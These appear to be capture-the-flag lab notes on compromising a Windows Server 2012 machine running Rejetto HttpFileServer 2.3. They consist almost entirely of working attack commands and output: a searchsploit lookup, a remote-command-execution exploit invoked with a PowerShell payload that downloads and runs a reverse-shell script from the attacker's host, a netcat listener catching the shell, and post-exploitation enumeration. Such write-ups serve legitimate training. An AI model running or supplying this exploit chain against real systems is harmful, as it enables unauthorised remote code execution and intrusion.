2 :80

HttpFileServer 2.3

$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                                                                 | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1


$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18/rev.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.14.18/rev.ps1%27%29.}

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
optimum\kostas

whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 31 Hotfix(s) Installed.

cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
v1.0.3705
v1.1.4322
v2.0.50727
v4.0.30319

Last updated